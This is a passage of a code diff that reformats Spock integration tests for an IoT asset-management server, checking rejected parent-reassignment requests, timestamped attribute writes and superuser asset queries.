+    def groupParent = assetResource.create(null, new GroupAsset("Rooms only", RoomAsset.class).setRealm(keycloakTestSetup.realmMaster.name))
+    def invalidChild = assetResource.create(null, new ThingAsset("Invalid child").setRealm(keycloakTestSetup.realmMaster.name))
+
+    when: "an updateParent call tries to move a mismatched asset type under the group"
+    assetResource.updateParent(null, groupParent.id, [invalidChild.id])
+
+    then: "the request should be bad and the asset should not be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, invalidChild.id) as ThingAsset).parentId == null
+  }
+
+  def "Batch parent updates reject moving a local asset under a gateway asset as superuser"() {
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def gatewayService = container.getService(GatewayService.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there is a locally registered gateway asset in the building realm"
+    GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
+            .setRealm(managerTestSetup.realmBuildingName))
+    conditions.eventually {
+      assert gatewayService.isLocallyRegisteredGateway(gateway.id)
     }
 
-    def "Batch parent updates reject group child-type mismatches as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    and: "there is a regular asset in the same realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def localAsset = assetResource.create(null, new RoomAsset("Local asset").setRealm(managerTestSetup.realmBuildingName))
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    when: "an updateParent call tries to move the local asset under the gateway asset"
+    assetResource.updateParent(null, gateway.id, [localAsset.id])
 
-        and: "there is a group parent that only accepts room assets"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def groupParent = assetResource.create(null, new GroupAsset("Rooms only", RoomAsset.class).setRealm(keycloakTestSetup.realmMaster.name))
-        def invalidChild = assetResource.create(null, new ThingAsset("Invalid child").setRealm(keycloakTestSetup.realmMaster.name))
+    then: "the request should be bad and the asset should not be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetResource.get(null, localAsset.id) as RoomAsset).parentId == null
+  }
 
-        when: "an updateParent call tries to move a mismatched asset type under the group"
-        assetResource.updateParent(null, groupParent.id, [invalidChild.id])
+  def "Batch parent clear rejects gateway descendant assets as superuser"() {
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def gatewayService = container.getService(GatewayService.class)
 
-        then: "the request should be bad and the asset should not be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, invalidChild.id) as ThingAsset).parentId == null
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there is a locally registered gateway asset and a gateway descendant in the building realm"
+    GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
+            .setRealm(managerTestSetup.realmBuildingName))
+    conditions.eventually {
+      assert gatewayService.isLocallyRegisteredGateway(gateway.id)
+    }
+    def gatewayDescendant = assetStorageService.merge(
+            new RoomAsset("Gateway descendant")
+            .setId(UniqueIdentifierGenerator.generateId("GatewayDescendant"))
+            .setRealm(managerTestSetup.realmBuildingName)
+            .setParentId(gateway.id),
+            false,
+            gateway,
+            null
+            )
+
+    when: "an updateNoneParent call tries to clear the parent of the gateway descendant"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    assetResource.updateNoneParent(null, [gatewayDescendant.id])
+
+    then: "the request should be bad and the gateway descendant should remain attached to the gateway"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
+    (assetStorageService.find(gatewayDescendant.id, true) as RoomAsset).parentId == gateway.id
+  }
+
+  def "Test writing attributes with timestamps"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def clientEventService = container.getService(ClientEventService.class)
+    TimerService timerService = container.getService(TimerService.class)
+    AssetDatapointService datapointService = container.getService(AssetDatapointService.class)
+
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "the asset resource"
+    def serverUri = serverUri(serverPort)
+    def assetResource = getClientApiTarget(serverUri, MASTER_REALM, accessToken).proxy(AssetResource.class)
+
+    when: "an asset is created in the authenticated realm"
+    RoomAsset testAsset = new RoomAsset("Test Room")
+            .setRealm(keycloakTestSetup.realmMaster.name)
+            .addAttributes(new Attribute<Object>("noTimestampTest", ValueType.LONG))
+    testAsset = assetResource.create(null, testAsset)
+
+    then: "the asset should exist"
+    testAsset.name == "Test Room"
+    testAsset.type == RoomAsset.DESCRIPTOR.getName()
+    testAsset.realm == keycloakTestSetup.realmMaster.name
+    testAsset.parentId == null
+
+    when: "an attribute is updated with no timestamp"
+    testAsset = assetResource.get(null, testAsset.getId())
+
+    timerService.clock.advanceTime(10, TimeUnit.MINUTES)
+    timerService.stop(container)
+    Long timestamp = timerService.getCurrentTimeMillis()
+
+    assetResource.writeAttributeValue(null, testAsset.getId(), "noTimestampTest", 123)
+
+    then: "the attribute's timestamp should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute("noTimestampTest").get().getTimestamp().get() == timestamp
+      assert asset.getAttribute("noTimestampTest").get().getValue().get() == 123
     }
 
-    def "Batch parent updates reject moving a local asset under a gateway asset as superuser"() {
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def gatewayService = container.getService(GatewayService.class)
+    when: "an attribute is updated with a timestamp"
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    timerService.clock.advanceTime(10, TimeUnit.MINUTES)
+    timerService.stop(container)
+    timestamp = timerService.getCurrentTimeMillis()
 
-        and: "there is a locally registered gateway asset in the building realm"
-        GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
-                .setRealm(managerTestSetup.realmBuildingName))
-        conditions.eventually {
-            assert gatewayService.isLocallyRegisteredGateway(gateway.id)
-        }
+    assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, timestamp-2000, 123)
 
-        and: "there is a regular asset in the same realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def localAsset = assetResource.create(null, new RoomAsset("Local asset").setRealm(managerTestSetup.realmBuildingName))
-
-        when: "an updateParent call tries to move the local asset under the gateway asset"
-        assetResource.updateParent(null, gateway.id, [localAsset.id])
-
-        then: "the request should be bad and the asset should not be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetResource.get(null, localAsset.id) as RoomAsset).parentId == null
+    then: "the attribute's timestamp should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp-2000
+      assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 123
     }
 
-    def "Batch parent clear rejects gateway descendant assets as superuser"() {
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def gatewayService = container.getService(GatewayService.class)
+    when: "an attribute is updated with the current timestamp"
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    timerService.clock.advanceTime(10, TimeUnit.MINUTES)
+    timerService.stop(container)
+    timestamp = timerService.getCurrentTimeMillis()
 
-        and: "there is a locally registered gateway asset and a gateway descendant in the building realm"
-        GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
-                .setRealm(managerTestSetup.realmBuildingName))
-        conditions.eventually {
-            assert gatewayService.isLocallyRegisteredGateway(gateway.id)
-        }
-        def gatewayDescendant = assetStorageService.merge(
-                new RoomAsset("Gateway descendant")
-                        .setId(UniqueIdentifierGenerator.generateId("GatewayDescendant"))
-                        .setRealm(managerTestSetup.realmBuildingName)
-                        .setParentId(gateway.id),
-                false,
-                gateway,
-                null
-        )
+    assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, timestamp-2000, 123)
 
-        when: "an updateNoneParent call tries to clear the parent of the gateway descendant"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        assetResource.updateNoneParent(null, [gatewayDescendant.id])
-
-        then: "the request should be bad and the gateway descendant should remain attached to the gateway"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
-        (assetStorageService.find(gatewayDescendant.id, true) as RoomAsset).parentId == gateway.id
+    then: "the attribute's timestamp should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp-2000
+      assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 123
     }
 
-    def "Test writing attributes with timestamps"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def clientEventService = container.getService(ClientEventService.class)
-        TimerService timerService = container.getService(TimerService.class);
-        AssetDatapointService datapointService = container.getService(AssetDatapointService.class);
+    when: "an attribute value is updated with a timestamp earlier than the current value"
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, timestamp-3000, 1234)
 
-        and: "the asset resource"
-        def serverUri = serverUri(serverPort)
-        def assetResource = getClientApiTarget(serverUri, MASTER_REALM, accessToken).proxy(AssetResource.class)
-
-        when: "an asset is created in the authenticated realm"
-        RoomAsset testAsset = new RoomAsset("Test Room")
-                .setRealm(keycloakTestSetup.realmMaster.name)
-                .addAttributes(new Attribute<Object>("noTimestampTest", ValueType.LONG))
-        testAsset = assetResource.create(null, testAsset)
-
-        then: "the asset should exist"
-        testAsset.name == "Test Room"
-        testAsset.type == RoomAsset.DESCRIPTOR.getName()
-        testAsset.realm == keycloakTestSetup.realmMaster.name
-        testAsset.parentId == null
-
-        when: "an attribute is updated with no timestamp"
-        testAsset = assetResource.get(null, testAsset.getId())
-
-        timerService.clock.advanceTime(10, TimeUnit.MINUTES);
-        timerService.stop(container)
-        Long timestamp = timerService.getCurrentTimeMillis()
-
-        assetResource.writeAttributeValue(null, testAsset.getId(), "noTimestampTest", 123)
-
-        then: "the attribute's timestamp should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute("noTimestampTest").get().getTimestamp().get() == timestamp;
-            assert asset.getAttribute("noTimestampTest").get().getValue().get() == 123;
-
-        }
-
-        when: "an attribute is updated with a timestamp"
-        testAsset = assetResource.get(null, testAsset.getId())
-
-        timerService.clock.advanceTime(10, TimeUnit.MINUTES);
-        timerService.stop(container)
-        timestamp = timerService.getCurrentTimeMillis()
-
-        assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, timestamp-2000, 123)
-
-        then: "the attribute's timestamp should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp-2000;
-            assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 123;
-
-        }
-
-        when: "an attribute is updated with the current timestamp"
-        testAsset = assetResource.get(null, testAsset.getId())
-
-        timerService.clock.advanceTime(10, TimeUnit.MINUTES);
-        timerService.stop(container)
-        timestamp = timerService.getCurrentTimeMillis()
-
-        assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, timestamp-2000, 123)
-
-        then: "the attribute's timestamp should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp-2000;
-            assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 123;
-
-        }
-
-        when: "an attribute value is updated with a timestamp earlier than the current value"
-
-        assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, timestamp-3000, 1234)
-
-        then: "the timestamp and value of the attribute should be the original one"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp-2000;
-            assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 123;
-        }
-
-        when: "an attribute value is updated with a timestamp of current clock time"
-        assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, 0, 12345)
-
-        then: "the timestamp and value of the attribute should be the new ones"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp;
-            assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 12345;
-        }
-
-        timerService.clock.advanceTime(10, TimeUnit.MINUTES);
-
-        when: "Multiple attribute values are updated with current timestamps"
-        timestamp = timerService.getCurrentTimeMillis();
-
-        List<AttributeEvent> states = new ArrayList<>();
-        states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 123456), timestamp-3000));
-        states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 123456), timestamp-3000));
-
-        assetResource.writeAttributeEvents(null, states.toArray() as AttributeEvent[])
-
-        then: "the attribute value should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 123456;
-            assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp-3000;
-
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 123456;
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp-3000;
-        }
-
-        when: "Multiple attribute values are updated with future timestamps"
-        timestamp = timerService.getCurrentTimeMillis();
-
-        states = new ArrayList<>();
-        states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 1234567), timestamp-2000));
-        states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 1234567), timestamp-2000));
-
-        assetResource.writeAttributeEvents(null, states.toArray() as AttributeEvent[])
-
-        then: "the attribute value should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 1234567;
-            assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp-2000;
-
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 1234567;
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp-2000;
-        }
-
-        when: "Multiple attribute values are updated with past timestamps"
-        states = new ArrayList<>();
-        states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 12345678), timestamp-4000));
-        states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 12345678), timestamp-4000));
-
-        assetResource.writeAttributeEvents(null, states.toArray() as AttributeEvent[])
-
-        then: "the attribute value should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 1234567;
-            assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp-2000;
-
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 1234567;
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp-2000;
-        }
-
-        when: "Multiple attribute values are updated with no timestamps"
-        timerService.stop(container)
-        timestamp = timerService.getCurrentTimeMillis();
-
-        List<AttributeState> noTimestampStates = new ArrayList<>();
-        noTimestampStates.add(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 123456789));
-        noTimestampStates.add(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 123456789));
-
-        assetResource.writeAttributeValues(null, noTimestampStates.toArray() as AttributeState[])
-
-        then: "the attribute value should match"
-        new PollingConditions(timeout: 5, delay: 0.2).eventually {
-            RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
-            assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 123456789;
-            assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp;
-
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 123456789;
-            assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp;
-        }
-
+    then: "the timestamp and value of the attribute should be the original one"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp-2000
+      assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 123
     }
+
+    when: "an attribute value is updated with a timestamp of current clock time"
+    assetResource.writeAttributeValue(null, testAsset.getId(), testAsset.AREA.name, 0, 12345)
+
+    then: "the timestamp and value of the attribute should be the new ones"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(testAsset.AREA.name).get().getTimestamp().get() == timestamp
+      assert asset.getAttribute(testAsset.AREA.name).get().getValue().get() == 12345
+    }
+
+    timerService.clock.advanceTime(10, TimeUnit.MINUTES)
+
+    when: "Multiple attribute values are updated with current timestamps"
+    timestamp = timerService.getCurrentTimeMillis()
+
+    List<AttributeEvent> states = new ArrayList<>()
+    states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 123456), timestamp-3000))
+    states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 123456), timestamp-3000))
+
+    assetResource.writeAttributeEvents(null, states.toArray() as AttributeEvent[])
+
+    then: "the attribute value should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 123456
+      assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp-3000
+
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 123456
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp-3000
+    }
+
+    when: "Multiple attribute values are updated with future timestamps"
+    timestamp = timerService.getCurrentTimeMillis()
+
+    states = new ArrayList<>()
+    states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 1234567), timestamp-2000))
+    states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 1234567), timestamp-2000))
+
+    assetResource.writeAttributeEvents(null, states.toArray() as AttributeEvent[])
+
+    then: "the attribute value should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 1234567
+      assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp-2000
+
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 1234567
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp-2000
+    }
+
+    when: "Multiple attribute values are updated with past timestamps"
+    states = new ArrayList<>()
+    states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 12345678), timestamp-4000))
+    states.add(new AttributeEvent(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 12345678), timestamp-4000))
+
+    assetResource.writeAttributeEvents(null, states.toArray() as AttributeEvent[])
+
+    then: "the attribute value should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 1234567
+      assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp-2000
+
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 1234567
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp-2000
+    }
+
+    when: "Multiple attribute values are updated with no timestamps"
+    timerService.stop(container)
+    timestamp = timerService.getCurrentTimeMillis()
+
+    List<AttributeState> noTimestampStates = new ArrayList<>()
+    noTimestampStates.add(new AttributeState(testAsset.getId(), testAsset.AREA.getName(), 123456789))
+    noTimestampStates.add(new AttributeState(testAsset.getId(), testAsset.ROOM_NUMBER.getName(), 123456789))
+
+    assetResource.writeAttributeValues(null, noTimestampStates.toArray() as AttributeState[])
+
+    then: "the attribute value should match"
+    new PollingConditions(timeout: 5, delay: 0.2).eventually {
+      RoomAsset asset = assetResource.get(null, testAsset.getId()) as RoomAsset
+      assert asset.getAttribute(asset.AREA.getName()).get().getValue().get() == 123456789
+      assert asset.getAttribute(asset.AREA.getName()).get().getTimestamp().get() == timestamp
+
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getValue().get() == 123456789
+      assert asset.getAttribute(asset.ROOM_NUMBER.getName()).get().getTimestamp().get() == timestamp
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetPermissionsTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetPermissionsTest.groovy
@@ -45,1119 +45,1123 @@ import static org.openremote.model.value.ValueType.NUMBER
 
 class AssetPermissionsTest extends Specification implements ManagerContainerTrait {
 
-    def "Access assets as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def conditions = new PollingConditions(delay: 0.2, timeout: 5)
+  def "Access assets as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def conditions = new PollingConditions(delay: 0.2, timeout: 5)
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
 
-        /* ############################################## READ ####################################### */
+    /* ############################################## READ ####################################### */
 
-        when: "the home assets of the authenticated user are retrieved"
-        def assets = assetResource.getCurrentUserAssets(null)
+    when: "the home assets of the authenticated user are retrieved"
+    def assets = assetResource.getCurrentUserAssets(null)
 
-        then: "result should match"
-        assets.length == 0
+    then: "result should match"
+    assets.length == 0
 
-        when: "the root assets of the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                        .parents(new ParentPredicate(null))
-        )
+    when: "the root assets of the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .parents(new ParentPredicate(null))
+            )
 
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.smartOfficeId
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.smartOfficeId
 
-        when: "the child assets of an asset in the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(assets[0].id))
-        )
+    when: "the child assets of an asset in the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(assets[0].id))
+            )
 
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.groundFloorId
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.groundFloorId
 
-        when: "the root assets of the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                        .parents(new ParentPredicate(null))
-        )
+    when: "the root assets of the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .parents(new ParentPredicate(null))
+            )
 
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.smartOfficeId
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.smartOfficeId
 
-        when: "the root assets of the given realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                        .parents(new ParentPredicate(null))
-        )
+    when: "the root assets of the given realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .parents(new ParentPredicate(null))
+            )
 
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.smartBuildingId
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.smartBuildingId
 
-        when: "the child assets of an asset in a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(assets[0].id))
-        )
+    when: "the child assets of an asset in a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(assets[0].id))
+            )
 
-        then: "result should match"
